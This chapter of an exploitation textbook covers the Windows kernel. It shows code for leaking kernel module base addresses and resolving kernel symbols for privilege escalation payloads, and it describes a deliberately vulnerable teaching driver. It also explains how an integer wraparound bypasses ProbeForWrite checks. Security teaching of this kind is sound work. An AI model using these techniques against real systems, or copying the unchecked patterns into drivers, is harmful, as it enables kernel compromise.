Chapter 6 Windows

Information in this Chapter

  • Windows Kernel Overview

  • The Execution Step

  • Practical Windows Exploitation

Introduction

Trustworthy computing memo from Bill Gates 1 — 1/15/2002

[ … ]

Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms. We have done a great job of having teams work around the clock to deliver security fixes for any problems that arise. Our responsiveness has been unmatched - but as an industry leader we can and must do better. Our new design approaches need to dramatically reduce the number of such issues that come up in the software that Microsoft, its partners and its customers create. We need to make it automatic for customers to get the benefits of these fixes. Eventually, our software should be so fundamentally secure that customers never even worry about it.

[ … ]

In the past, we've made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We've done a terrific job at that, but all those great features won't matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security.

Nine years have passed since the famous “memo” written by Bill Gates was sent to all of Microsoft's employees. From that point onward, beginning with the release of Windows XP SP2, Windows operating system security has improved dramatically across the board. When the memo was released, the number of exploitable critical vulnerabilities affecting Windows products had reached a perilous threshold, forcing Microsoft to focus its efforts on improving overall system security. Consolidated methods such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR), which other operating systems had already adopted, combined with the enforcement of such concepts as the “principle of least privilege,” and a newfound emphasis on the “secure by default” mantra thereafter were strongly incorporated into the Windows world.

Not surprisingly, as the Windows OS as a whole changed to accommodate a more security-minded posture, the Windows kernel also evolved in terms of both functionality and security. In this chapter, we will look at a few common Windows kernel vulnerabilities, discover how to exploit them, and discuss how recent changes in the kernel have influenced both exploitation vectors and kernel payloads.

Before we continue, let's talk about the various Windows releases from a kernel perspective. Historically speaking, Windows OSes have been promoted as either server or desktop releases; as we will see, however, this separation is not reflected at the underlying kernel level.

Omitting the earlier Windows releases (which are no longer used today), we can consider the kernel underlying Windows 2000 (formally known as Windows NT 5.0) to be the first release of the second generation of NT kernels. Most of the functionalities and kernel interfaces that were present in this release were to highly influence every Windows version introduced thereafter. In 2001, Windows NT/2000 was merged with the old Windows desktop product to give life to Windows XP (formally known as Windows NT 5.1). Similarly, the server market was invaded a few years later by the immensely popular Windows Server 2003 (formally known as Windows NT 5.2). At the time of this writing, and despite the fact that mainstream support is coming to an end, Windows Server 2003 still remains the most prevalent server solution in the Microsoft world. Between the end of 2003 and the beginning of 2007, Microsoft released a few service packs for Windows XP and Windows Server 2003; Windows XP SP2 and Windows Server 2003 SP1 introduced certain security enhancements in such a way that many people have come to consider those service packs to be the equivalent of new releases of their respective operating systems.

At the end of 2006, Microsoft released a new mainstream operating system, Windows Vista (formally known as Windows NT 6.0). With Windows Vista, a few kernel components were completely rewritten, and many internal kernel structures were changed in a substantial way, such that we could consider this kernel to be part of a new mainstream branch from an exploitation point of view as well.

Finally, Microsoft released the most recent version of Windows to date, Windows 7 (formally known as Windows NT 6.1), intended as a desktop solution, as well as Windows Server 2008 R2, an enhanced version of the Windows Server 2008 product available only for 64-bit platforms.

In addition to the Windows release version, we must also take into account another very important aspect: the processor on which the operating system is to run. With the introduction of Windows XP (with Windows XP x64) and Windows Server 2003, Microsoft began to support 64-bit processors, both Itanium and x86-64 based. As is to be expected, every 64-bit release of the Windows kernel runs in a fully 64-bit environment (although backward support has been maintained for legacy 32-bit applications on x86-64 architectures). Since there were no legacy 64-bit applications or drivers, Microsoft was not forced to maintain backward compatibility, so it began to insert interesting new features and APIs, both in user land and in kernel land, such as disposal of stack-based structured exception handling, the introduction of table-based unwind exception handling, permanent DEP, and Kernel Patch Protection (KPP), among others.

After taking all of this into account, and in an attempt to avoid being repetitious, in this chapter we will analyze only two of the aforementioned kernels: the one installed with Windows Server 2003 SP2 (32-bit version, kernel NT 5.2), and the one installed with Windows Server 2008 R2 SP2 (64-bit version, kernel NT 6.1). You can apply most of the descriptions related to the NT 5.2 kernel to all members of the NT 5.x mainstream family; the same is true for the NT 6.1 kernel with respect to the NT 6.x Windows family. Let's now move on to a brief description of the Windows NT kernel, as well as a discussion of the debugging environment we will need to build to analyze our example exploitation scenarios.

Windows Kernel Overview

The Windows kernel is essentially a monolithic kernel, such that the core of the operating system and the device drivers share the same memory address space, all running together at the highest possible privilege level (Ring 0 on x86/x86-64). The first component we will look at, and the one that we are most interested in, is the Kernel Executive. This component implements the basic OS functions: processes, threads, virtual memory, interrupt and trap handling, exception management, cache management, I/O management, asynchronous procedure calls, the Registry, object management, events (a.k.a. synchronization primitives), and many other low-level interfaces. The Kernel Executive is implemented in Ntoskrnl.exe, whose binary image is in the C:\WINDOWS\SYSTEM32 directory path. It bears mentioning that separate uniprocessor and multiprocessor versions of the kernel still exist; moreover, on 32-bit systems there are also different kernels based on Physical Address Extension (PAE), as shown in Table 6.1, which summarizes all of the kernel names together with the context in which they are used.

Table 6.1 Different kernels

Kernel Filename        Original Filename (UP)   Original Filename (SMP)
Ntoskrnl.exe           Ntoskrnl.exe             Ntkrnlmp.exe
Ntkrnlpa.exe (PAE)     Ntkrnlpa.exe             Ntkrpamp.exe

The other important kernel component we'll look at is the Hardware Abstraction Layer (HAL), which is responsible for isolating device drivers and the Kernel Executive from platform-specific hardware differences. The HAL is implemented within the hal.dll module and, as with the Kernel Executive, there are different versions of the HAL depending on whether one is on a uniprocessor or a multiprocessor system. The remaining components are loaded as kernel drivers (or as modules) into the running kernel; for example, win32k.sys implements the kernel side of the Windows subsystem and the GUI of the operating system, while tcpip.sys implements most of the TCP/IP networking stack.

Kernel Information Gathering

Sometimes kernel version differences can have an impact on the exploitation vector we intend to use. To make sure we are approaching the issue properly, we will need to know which system configuration we are working with. In line with this goal, the first important thing we need to obtain is the correct operating system version. To determine this, when dealing with a local privilege escalation exploit we can query the system itself for the operating system version via the GetVersionEx() API. This function will return the major, minor, and build numbers in an OSVERSIONINFO structure. You can use the following code from a user-land process to detect the Windows OS version:

VOID GetOSVersion(PDWORD major, PDWORD minor, PDWORD build)
{
    OSVERSIONINFO osver;

    ZeroMemory(&osver, sizeof(OSVERSIONINFO));
    osver.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osver);

    if(major)
        *major = osver.dwMajorVersion;
    if(minor)
        *minor = osver.dwMinorVersion;
    if(build)
        *build = osver.dwBuildNumber;
}
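As a small illustration, the major and minor numbers can be mapped back to the kernel families listed in the introduction. The helper below is a hypothetical sketch (KernelFamilyName() is not a Windows API); it uses plain C types so that it builds without the Windows headers, and it only covers the releases named in this chapter.

```c
#include <stddef.h>

/* Map a major/minor version pair (as reported by GetVersionEx()) to the
 * kernel family names used in this chapter. Hypothetical helper; returns
 * NULL for versions the chapter does not discuss. */
const char *KernelFamilyName(unsigned long major, unsigned long minor)
{
    if (major == 5) {
        switch (minor) {
        case 0: return "NT 5.0 (Windows 2000)";
        case 1: return "NT 5.1 (Windows XP)";
        case 2: return "NT 5.2 (Windows Server 2003)";
        }
    } else if (major == 6) {
        switch (minor) {
        case 0: return "NT 6.0 (Windows Vista)";
        case 1: return "NT 6.1 (Windows 7 / Windows Server 2008 R2)";
        }
    }
    return NULL; /* not covered in this chapter */
}
```

A caller would typically pass the values filled in by GetOSVersion() and fall back to a generic code path when NULL is returned.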

Sometimes, in addition to knowing the OS version, we need to know the exact Kernel Executive version (patch level), as well as the environment on which it is running (UP/SMP, 64/32, PAE/not PAE). Merely looking at the Kernel Executive filesystem name is not enough, since the name of the kernel on disk is always taken from the uniprocessor kernel version (i.e., it will always be either Ntoskrnl.exe or Ntkrnlpa.exe).

To acquire more information about the installed kernel image, we can look at the kernel binary properties: original filename and file version, as shown in Figure 6.1.

Figure 6.1 Executive kernel name and version.

If more than one kernel binary is installed, we'll need to rely on the loaded modules/drivers list to discover which binary is the running Kernel Executive. Along with kernel module names, we will also discover the base virtual memory address of each module. After we have pinpointed the exact base addresses of all of the kernel modules, we can subsequently and easily relocate any symbols we wish (e.g., we can resolve all drivers’ exported functions). To extract the module list, we need to use the partially documented NtQuerySystemInformation() kernel API. This function is used to retrieve a few pieces of operating system information, such as system performance information and process information. The function prototype is as follows:

NTSTATUS WINAPI NtQuerySystemInformation(
    __in      SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout   PVOID SystemInformation,
    __in      ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
);

To reach our objective, we will need to call the function, passing the undocumented SystemModuleInformation SYSTEM_INFORMATION_CLASS parameter. The API can be called by an unprivileged process, and returns an array of structures holding SYSTEM_MODULE_INFORMATION_ENTRY entries, as shown in the following code snippet:

BOOL GetKernelBase(PVOID* kernelBase, PCHAR kernelImage)
{
    _NtQuerySystemInformation NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION pModuleInfo;
    ULONG i, len = 0;
    NTSTATUS ret;
    HMODULE ntdllHandle;

    ntdllHandle = GetModuleHandle(_T("ntdll"));                      /* [1] */
    if(!ntdllHandle)
        return FALSE;

    NtQuerySystemInformation = (_NtQuerySystemInformation)
        GetProcAddress(ntdllHandle, "NtQuerySystemInformation");     /* [2] */
    if(!NtQuerySystemInformation)
        return FALSE;

    /* First call: zero-length buffer, only to learn the required size. */
    NtQuerySystemInformation(SystemModuleInformation,                /* [3] */
                             NULL,
                             0,
                             &len);

    pModuleInfo =
        (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); /* [4] */
    if(!pModuleInfo)
        return FALSE;

    ret = NtQuerySystemInformation(SystemModuleInformation,          /* [5] */
                                   pModuleInfo,
                                   len,
                                   &len);
    if(ret < 0)    /* a negative NTSTATUS value indicates failure */
    {
        GlobalFree(pModuleInfo);
        return FALSE;
    }

#ifdef _K_DEBUG
    for(i=0; i < pModuleInfo->Count; i++)                            /* [6] */
    {
        printf("[*] Driver Entry: %s at %p\n",
               pModuleInfo->Module[i].ImageName,
               pModuleInfo->Module[i].Base);
    }
#endif

    /* The caller must supply a kernelImage buffer large enough for the path. */
    strcpy(kernelImage, pModuleInfo->Module[0].ImageName);           /* [7] */
    *kernelBase = pModuleInfo->Module[0].Base;                       /* [8] */

    GlobalFree(pModuleInfo);
    return TRUE;
}

The GetKernelBase() function obtains a handle to the ntdll.dll library using the dynamic runtime linking interface. Since NtQuerySystemInformation() has no associated import library, we are forced to use the GetModuleHandle() [1] and GetProcAddress() [2] functions to dynamically obtain its address within the ntdll.dll library memory address range. At [3], the NtQuerySystemInformation() function is called with the SystemInformationLength parameter set to 0. In this manner, we obtain (through ReturnLength) the size of the buffer that the SystemInformation argument must point to in order to hold the SYSTEM_MODULE_INFORMATION_ENTRY array. After having allocated enough memory at [4], we call the NtQuerySystemInformation() function once again, at [5], this time with the parameters needed to fill the array. The loop at [6] scans and prints every entry for debugging purposes. The pModuleInfo->Module[N].ImageName field holds the name of the Nth module, and pModuleInfo->Module[N].Base holds its virtual memory base address. The first (N == 0) module is always the Kernel Executive (e.g., Ntoskrnl.exe). The preceding code will produce output similar to the following on a Windows Server 2008 R2 64-bit system:

[*] Driver Entry: \SystemRoot\system32\ntoskrnl.exe at FFFFF80001609000
[*] Driver Entry: \SystemRoot\system32\hal.dll at FFFFF80001BE3000
[*] Driver Entry: \SystemRoot\system32\kdcom.dll at FFFFF8000152D000
[*] Driver Entry: \SystemRoot\system32\PSHED.dll at FFFFF88000C8C000
[*] Driver Entry: \SystemRoot\system32\CLFS.SYS at FFFFF88000CA0000

[…]
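The ImageName strings in this output are full NT-style paths rather than bare file names. When only the file name is needed, for instance to locate the same binary on disk, the last path component can be extracted with a few lines of standard C. The helper below is a hypothetical sketch (ModuleFileName() is not part of any Windows API) and assumes a NUL-terminated, backslash-separated path.

```c
#include <string.h>

/* Return a pointer to the file-name component of an NT-style path such as
 * "\SystemRoot\system32\ntoskrnl.exe". The returned pointer aliases the
 * input string; nothing is allocated or copied. */
const char *ModuleFileName(const char *imagePath)
{
    const char *lastSep = strrchr(imagePath, '\\');

    /* No separator at all: the input already is a bare file name. */
    return lastSep ? lastSep + 1 : imagePath;
}
```

Applied to the first entry of the list, the helper yields the file name of the running Kernel Executive.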

After discovering the correct base address of the Kernel Executive, we can resolve the kernel address of any exported function by loading the same binary image in user land and rebasing the function's relative virtual address (RVA) on the real kernel base address leaked by NtQuerySystemInformation(). Do not confuse RVAs with virtual memory addresses. An RVA is the virtual address of an object (a symbol) from the binary file after being loaded into memory, minus the actual base address of the file image in memory. To convert an RVA to the corresponding virtual address, we have to add the RVA to the corresponding module image base address. The procedure to relocate Kernel Executive functions, hence, is straightforward. We have to load the kernel image into user-mode address space via the LoadLibrary() API, and then pass the HMODULE handle to a function which resolves the RVA, as shown in the following code:

FARPROC GetKernAddress(HMODULE UserKernBase,
                       PVOID RealKernelBase,
                       LPCSTR SymName)
{
    PUCHAR KernBaseTemp = (PUCHAR)UserKernBase;
    PUCHAR RealKernBaseTemp = (PUCHAR)RealKernelBase;
    PUCHAR temp = (PUCHAR)GetProcAddress(UserKernBase, SymName);     /* [1] */

    if(temp == NULL)
        return NULL;

    /* (temp - KernBaseTemp) is the RVA; rebase it on the real kernel base. */
    return (FARPROC)(temp - KernBaseTemp + RealKernBaseTemp);        /* [2] */
}

The preceding function takes three parameters: UserKernBase is the HMODULE returned by the LoadLibrary() API, RealKernelBase is the kernel base address obtained through NtQuerySystemInformation(), and SymName is the name of the exported symbol we want to resolve. At [1], the function gets the address of the symbol relocated in user space, and at [2], the function subtracts the base address of the module to get the RVA. At this point, the RVA is added to the kernel base to compute the symbol's final virtual address. We will need a few of the Kernel Executive's exported functions to construct a portable local privilege escalation kernel payload; if necessary, however, we will also be able to extract any symbols we might need from any other driver modules that might be available (e.g., hal.dll, kdcom.dll, etc.).
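The arithmetic behind this relocation can be checked in isolation. The sketch below uses plain 64-bit integers instead of pointers; the function names are illustrative, and the user-land addresses in the usage note are made up, while the kernel base is the one shown in the sample output earlier in this section.

```c
#include <stdint.h>

/* RVA = address of the symbol inside a mapping - base address of that mapping. */
uint64_t RvaFromMapping(uint64_t symbolAddr, uint64_t imageBase)
{
    return symbolAddr - imageBase;
}

/* Virtual address = base address of the target mapping + RVA. */
uint64_t VaFromRva(uint64_t rva, uint64_t imageBase)
{
    return imageBase + rva;
}
```

For example, if the user-land copy of the kernel image were mapped at 0x140000000 and a symbol resolved to 0x140012340, the RVA would be 0x12340; rebased on the kernel base 0xFFFFF80001609000, the symbol's kernel address would be 0xFFFFF8000161B340.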

Introducing DVWD: Damn Vulnerable Windows Driver

Most of the vulnerabilities discussed in the rest of this book involve the exploitation of real-world bugs that have been found in the wild. In this chapter, we chose to take a different approach, and instead created a simple and straightforward Windows driver that contains a few of the most common basic vulnerabilities one is likely to encounter from a general standpoint. In real-world drivers, of course, things will vary among drivers (and among exploits), but the main concepts and techniques that we will explore in this chapter can be applied as is to real-world vulnerability scenarios.

You can download the dummy driver we will be analyzing from the book's Web site at www.attackingthecore.com. The code compiles well on both Windows Server 2003 32-bit systems and Windows Server 2008 R2 64-bit systems using the latest Windows Driver Kit (WDK), which you can download from Microsoft's Web site (at no cost) at www.microsoft.com/whdc/devtools/wdk/RelNotesW7.mspx.

Tools & Traps…

WDK: The Windows Driver Kit

The Windows Driver Kit is the most powerful and complete environment currently available for building kernel device drivers. With the WDK, we can build device drivers for both 32-bit and 64-bit Windows operating systems—ranging from Windows XP to the latest releases of both Windows 7 and Windows Server 2008 R2. The WDK includes not only the compiler and the linker, but also all of the kernel headers, along with various interesting and useful tools.

With the WDK, we can build device drivers for every NT 5.x system (except Windows 2000) and NT 6.x system on the market. For older Windows versions (which we will not be covering here), one would need to download the Driver Development Kit (DDK), which was the old build environment for such tasks. Old releases of the WDK and DDK are available via the Microsoft WDK Connect site. Build instructions for compiling and installing the kernel module are provided on this book's Web site, www.attackingthecore.com.

The dummy driver created for use in this chapter, DVWD, is composed primarily of three files: Driver.c, StackOverflow.c, and Overwrite.c. A brief description of each of these files follows:

  • The Driver.c file is responsible for initializing a virtual device. It creates the \\.\DVWD device, and registers two vulnerable IOCTL handlers. The first handler is invoked when the control code DEVICEIO_DVWD_STACK_OVERFLOW has been specified; the second handler is invoked when the DEVICEIO_DVWD_OVERWRITE control code has been used.

  • The StackOverflow.c and Overwrite.c files hold the vulnerable code. StackOverflow.c hosts the handler that is invoked when the DEVICEIO_DVWD_STACK_OVERFLOW control code has been used. This handler is vulnerable to a straightforward stack-based buffer overflow attack. Overwrite.c hosts the related DEVICEIO_DVWD_OVERWRITE handler. This handler is vulnerable to a so-called kernel memory arbitrary overwrite vulnerability, allowing the attacker to arbitrarily write data inside the kernel's virtual memory. This type of vulnerability is very common in third-party drivers written for Windows, including many antivirus and host-based intrusion detection system (IDS) products.

Kernel Internals Walkthrough

To better understand the sample DVWD code, we will first need to introduce a few core Windows kernel concepts, namely, Device I/O Control implementation, I/O Request Packet (IRP) dispatching, and the method by which data is accessed via the user-mode interface.

Device I/O Control and IRP Dispatching

We can look at the DeviceIoControl() API as being similar to an ioctl() call on UNIX-like systems, such as we discussed in the preceding chapter. This function sends a control code directly to a specific device driver to perform a corresponding operation. Usually, along with the control code, a process will also send custom data that the driver handler must interpret correctly. This is the DeviceIoControl() prototype:

BOOL WINAPI DeviceIoControl(HANDLE hDevice,
                            DWORD dwIoControlCode,
                            LPVOID lpInBuffer,
                            DWORD nInBufferSize,
                            LPVOID lpOutBuffer,
                            DWORD nOutBufferSize,
                            LPDWORD lpBytesReturned,
                            LPOVERLAPPED lpOverlapped);

The function takes a few parameters, the most important ones being the device HANDLE, the I/O control code, and the addresses of the input and output buffers. When the function returns from a synchronous operation, the DWORD addressed by the lpBytesReturned pointer holds the size of the data stored in the output buffer. Finally, lpOverlapped holds the address of an OVERLAPPED structure that is used during asynchronous requests. Depending on the dwIoControlCode parameter, the input and output buffers addressed by lpInBuffer and lpOutBuffer may be NULL.

When a user-mode process issues a call through the DeviceIoControl() API, the I/O Manager (which is within the Kernel Executive module) creates an IRP and delivers it to the device driver. An IRP, a structure that encapsulates the I/O request and maintains a request status, is then passed through the driver stack until a driver can fully or partially handle it; it can be processed synchronously or asynchronously, and can be sent to a lower driver or even cancelled during its processing. The I/O Manager can automatically create an IRP in response to a user-mode process operation (such as a call to the DeviceIoControl() routine), or a high-level driver can create it within the kernel to be able to communicate with a lower-level driver.

By assuming that the I/O Manager has generated the I/O Request Packet during a DeviceIoControl() from a user-mode process, we can simplify the description—provided, of course, that the addresses of memory pages passed within the IRP will always belong to the user-mode address space.

But how, then, is the kernel able to access user address space, and how is it possible for data to be copied into kernel memory? There are three types of data transfer mechanisms: Buffered I/O, Direct I/O, and Neither Buffered nor Direct I/O.

Buffered I/O is the simplest mechanism; in Buffered I/O, the I/O Manager directly copies the input data from user space into a kernel buffer and then passes the buffer to the handler. The I/O Manager is also responsible for copying data back into the user-mode output buffer that is being addressed. With Buffered I/O, the device driver can directly read the input buffer and write to the output buffer without further checks (other than for size), since the buffer already resides within the kernel address space. Things are handled a bit differently when Direct I/O transfer is used. In this case, the I/O Manager initializes and passes to the device driver handler a memory descriptor list (MDL) describing the requested user-mode buffer. The MDL is an opaque internal structure that is used to describe a set of physical pages. A driver that performs Direct I/O transfer has to create a local virtual kernel mapping before it is able to access target pages. After having properly locked and mapped the MDL into the kernel address space, the driver will be able to directly access the associated pages.

The Neither Buffered nor Direct I/O method, as the name suggests, simply uses neither the Buffered I/O nor the Direct I/O method; instead, the device driver is able to access user-mode buffers directly. Since this is the only way in which complex structures may be passed, a lot of third-party drivers use this method to pass their custom data structures along to their corresponding device driver(s). All of the code samples within the DVWD utilize this method. As one might expect, since this method requires the management of untrusted data within an untrusted environment (the user address space), a few more security checks are required. The driver must check the virtual address range and its permissions while at the same time not making any assumptions about the content of—or even the existence of—any user-mode buffers while accessing it. It is now time to take a look at how a driver should operate so that it can access user address space properly.
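On Windows, the transfer method used for a Device I/O Control request is encoded in the two low-order bits of the control code itself; this is the layout produced by the WDK's CTL_CODE macro. The sketch below mirrors that layout with locally defined names so that it builds without the Windows headers. The device type and function number used in the usage note are assumptions for illustration, since the actual DVWD control code values are not given here.

```c
#include <stdint.h>

/* Transfer methods; the values mirror METHOD_BUFFERED, METHOD_IN_DIRECT,
 * METHOD_OUT_DIRECT, and METHOD_NEITHER from the WDK headers. */
enum TransferMethod {
    XFER_BUFFERED   = 0,
    XFER_IN_DIRECT  = 1,
    XFER_OUT_DIRECT = 2,
    XFER_NEITHER    = 3
};

/* Same bit layout as CTL_CODE(DeviceType, Function, Method, Access). */
uint32_t MakeCtlCode(uint32_t deviceType, uint32_t function,
                     uint32_t method, uint32_t access)
{
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

/* Extract the transfer method from an existing control code. */
enum TransferMethod CtlCodeMethod(uint32_t code)
{
    return (enum TransferMethod)(code & 3u);
}
```

For instance, a hypothetical code built from device type 0x22 (FILE_DEVICE_UNKNOWN), function number 0x800, and the Neither method with unrestricted access evaluates to 0x222003. When auditing a driver, decoding the low two bits of each control code is a quick way to spot handlers that touch user-mode buffers directly.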

User to Kernel/Kernel to User

Accessing user-mode buffers directly from kernel mode can be a very dangerous practice from a security perspective. But why is this? And what does a well-written device driver have to do to access user-mode address space correctly, thereby avoiding any untoward security issues? This is a key concept we will need to understand to fully comprehend the exploitation vectors we will be coming across in a Windows environment.

What follows constitutes a typical snippet of code showing how a driver is able to directly access the user-space buffer by way of a kernel routine:

__try
{
    ProbeForRead(userBuffer, len, TYPE_ALIGNMENT(char));
    RtlCopyMemory(kernelBuffer, userBuffer, len);
} __except(EXCEPTION_EXECUTE_HANDLER)
{
    ret = GetExceptionCode();
}

The preceding code simply copies a user-land buffer into a kernel-space buffer. All of the code is enclosed within a __try/__except block, which is used to manage software exceptions. The __try/__except blocks are mandatory when dealing with user-land pointers. (We will discuss the implementation of exception blocks and the exception dispatching mechanism in the section “Practical Windows Exploitation,” later in this chapter). Moving on to the code within the __try/__except block, pointers that address hypothetical user-mode address space (such as userBuffer in the preceding example) must always be checked—otherwise, it would be possible for an evil user-mode process to pass an invalid pointer capable of addressing kernel pages. Windows provides two kernel function primitives that we can use to validate the user-mode-supplied buffers: ProbeForRead() and ProbeForWrite(). The prototype of ProbeForRead() is as follows:

VOID ProbeForRead(CONST VOID *Address,
                  SIZE_T Length,
                  ULONG Alignment);

The Address parameter specifies the beginning of the user-mode buffer, the Length parameter specifies its length in bytes, and the Alignment parameter is the required address alignment. This function verifies that the buffer is actually confined within the user address space.

Note

The user-land virtual address space on Windows takes up the first linear 2GB on 32-bit processes when running on top of 32-bit kernels (the first 3GB if the /3GB split option is specified on the boot command line). It takes up the first linear 4GB on 32-bit processes when running on top of 64-bit kernels. And it takes up the first linear 8TB on 64-bit native processes running on top of 64-bit kernels (x64).

As we can see, the ProbeForRead() function is placed inside a __try/__except exception block. The function, in fact, will return successfully only if the buffer is actually confined within the user address space; if it falls outside this area, an exception is triggered and the already mentioned except block must intercept it. There are two important matters that we need to address about this function. The first matter is related to the access check implementation. This function does not access the user-mode buffer at all—it merely verifies that the buffer is within the correct range and that the supplied pointer is correctly aligned. What happens if the buffer is valid but the user-land range is not fully mapped? Any such buffers would successfully be able to pass the test, since an exception wouldn't be triggered until later, when the driver reads the buffer. Passing a partially invalid buffer to the kernel, however, is not the only way to trigger the exception; an evil thread is always capable of deleting, substituting, or changing the protection of the user address space even after the probe call.
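The kind of check performed by the probe functions can be approximated with a small user-mode model. This is a simplified sketch, not the kernel's implementation: it returns a boolean instead of raising an exception, it assumes a 32-bit layout with the plain 2GB boundary from the preceding Note (the limit used by a real kernel may differ), and it assumes the alignment is a power of two. Note that the model never dereferences the address, and that a zero length is accepted without looking at the address at all.

```c
#include <stdbool.h>
#include <stdint.h>

/* First address past the 2GB user range of a 32-bit process (assumption
 * taken from the Note above; not the kernel's actual probe limit). */
#define MODEL_USER_LIMIT_32 0x80000000u

/* Model of a probe: range and alignment checks only, no memory access. */
bool ModelProbe(uint32_t address, uint32_t length, uint32_t alignment)
{
    uint32_t end;

    if (length == 0)
        return true;                     /* nothing to validate */
    if (address & (alignment - 1))
        return false;                    /* misaligned pointer */

    end = address + length;
    if (end < address)
        return false;                    /* range wraps around 4GB */

    return end <= MODEL_USER_LIMIT_32;   /* must stay inside user space */
}
```

A buffer that lies entirely below the limit passes even if no page in that range is mapped, which is exactly why the later access must still be guarded by the exception block.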

The other interesting matter regards the Length parameter. If a zero-length parameter is passed to the function, it will return immediately without ever checking the source buffer. Although this behavior may at first seem logical, it can be abused—and sometimes exploited—if an integer overflow or an integer wraparound occurs during the length calculation. Take a look at the following piece of code:

__try {
    ProbeForWrite(user_controlled_ptr,
                  sizeof(DWORD) + controlled_len,         /* [1] */
                  TYPE_ALIGNMENT(char));

    *((DWORD *)user_controlled_ptr) = 0xdeadbeaf;         /* [2] */
    user_controlled_ptr += sizeof(DWORD);

    for(i=0; i<controlled_element; i++)
    {
        VOID *dest = user_controlled_ptr + sizeof(Object)*i;
        [ … ]

In this example, the kernel needs to validate the user-supplied parameter user_controlled_ptr. Let us assume we are working in a 32-bit kernel environment. Provided we can also somehow arbitrarily control the controlled_len variable, the check executed at [1] can be bypassed using a value of 0xFFFFFFFC. Since sizeof(DWORD) is equal to 4, the final length is 0 (taking into account the unsigned integer wraparound). The ProbeForWrite() function will then immediately return without performing any further checks on the user_controlled_ptr address. What would happen if user_controlled_ptr were to hold a kernel-space address? The answer is straightforward: a partially controlled memory corruption (at [2]) would occur. This is a particularly common error in third-party drivers that compute user-mode buffer sizes. We will see in the section “Practical Windows Exploitation” how built-in exception handling is implemented and how we can abuse its inner logic to bypass stack overflow protections.
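The wraparound itself is easy to reproduce with 32-bit unsigned arithmetic. The sketch below contrasts the length computation used at [1] with an overflow-aware variant; both function names are hypothetical, and uint32_t stands in for the 32-bit DWORD and SIZE_T types of the scenario above.

```c
#include <stdbool.h>
#include <stdint.h>

/* Length as computed at [1] on a 32-bit kernel: the sum silently wraps. */
uint32_t UncheckedLength(uint32_t controlledLen)
{
    return (uint32_t)sizeof(uint32_t) + controlledLen;
}

/* Overflow-aware variant: returns false when the sum does not fit in
 * 32 bits, otherwise stores the total in *total and returns true. */
bool CheckedLength(uint32_t controlledLen, uint32_t *total)
{
    if (controlledLen > UINT32_MAX - (uint32_t)sizeof(uint32_t))
        return false;

    *total = (uint32_t)sizeof(uint32_t) + controlledLen;
    return true;
}
```

With controlledLen set to 0xFFFFFFFC, UncheckedLength() returns 0, whereas CheckedLength() reports the overflow so that the request can be rejected before any probe is attempted.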

Tip

Different OSes use different approaches when dealing with user-space buffers. For example, the Linux kernel, on x86 systems, implements a set of internal APIs (copy_from_user(), copy_to_user(), etc.), which must always be called when dealing with user-space buffers. Since Linux does not implement any sort of software exception (such as structured exception handling [SEH]), it registers in a kernel table the addresses of all of the assembly instructions that reference user address space. When a page fault exception occurs, the kernel searches this table looking for an address that matches the faulty instruction pointer address. If it finds the address, it returns out of the exception handler and passes control to the corresponding fix-up routine, which in turn will force the API to return an error code. In this scenario, the device driver is not concerned with checking for an invalid user-mode address; instead, it simply invokes the API and checks the return value. This entire process is completely hidden from the driver perspective.

In the Windows world, however, as we have seen before, the device drivers are aware of exception handling and must perform proper user-space access checking inside an exception block to be able to manage a triggered exception. When performing kernel audits or writing kernel fuzzers, we must always take into account that within Windows the exception handler can be invoked at any time while in the __try/__except block. If multiple accesses are made to the user-mode address, the exception can provoke different behavior that the handler might not be able to account for. Moreover, since it is very uncommon for a user-mode process to pass an invalid pointer during a system call, the kernel code path that is handling the exception is not always well tested. When the exception handler deals with resources in the __try/__except exception block, it is not uncommon to find that poorly written code is leaking memory, double-freeing buffers, or attempting to use a buffer after it has already been freed.
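The table lookup described above for Linux can be pictured with a toy model. This is only an illustration of the idea: the structure and function names are invented, the addresses in the usage note are made up, and the real kernel's table layout and search strategy differ in detail.

```c
#include <stddef.h>
#include <stdint.h>

/* One entry per instruction that is allowed to fault on a user address. */
struct FixupEntry {
    uintptr_t insn;    /* address of the instruction that may fault */
    uintptr_t fixup;   /* address of the recovery code for that instruction */
};

/* Return the fix-up address registered for faultIp, or 0 when the faulting
 * instruction is not in the table (i.e., the fault is a genuine kernel bug). */
uintptr_t FindFixup(const struct FixupEntry *table, size_t count,
                    uintptr_t faultIp)
{
    size_t i;

    for (i = 0; i < count; i++) {
        if (table[i].insn == faultIp)
            return table[i].fixup;
    }
    return 0;
}
```

In this model, a page fault handler would resume execution at the returned address, which in turn makes the user-copy routine return an error code to the driver.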

Kernel Debugging

When dealing with kernel vulnerabilities, especially when the vulnerability concerns a memory corruption or a race condition that is difficult to trigger, a debugger is mandatory. Since we will be dealing with the output of several WinDbg commands throughout the remainder of this chapter, it is important that we set up our environment properly to be able to reproduce the analysis.

WinDbg is a powerful graphical interface debugger armed with many useful functions. It is highly versatile, and we can use it as both a fully featured source-level debugger and a binary-only reverse-engineering environment. In addition, we can use it for both user-mode application debugging as well as (and more importantly to us) kernel debugging. It fully supports Windows symbol files, and can be used quite satisfactorily to debug the Windows kernel. The kernel debugger is very versatile and can target all supported architectures (x86 32-bit, x86 64-bit, and Itanium). Not only can the debugger detect the target kernel without user intervention, but it also can be set up to automatically download the correctly synced symbol file from Microsoft's official symbol server. What follows is a simple description of how to set up WinDbg as a kernel debugger.

The kernel debugger is not usually run on the same system upon which the target kernel is running, but is instead generally connected to the target system via such external methods as a serial null modem cable or an IEEE-1394 FireWire connection. In the following example, we will bypass the hardware route and instead use a “virtual” null modem cable through a VMware-emulated serial line, with the target kernel running in VMware as a guest operating system.

Note

The use of VMware as a virtualization solution is not mandatory. Any other virtualization environment that supports serial line emulation (with polled mode support) can be used to debug a guest kernel through WinDbg.

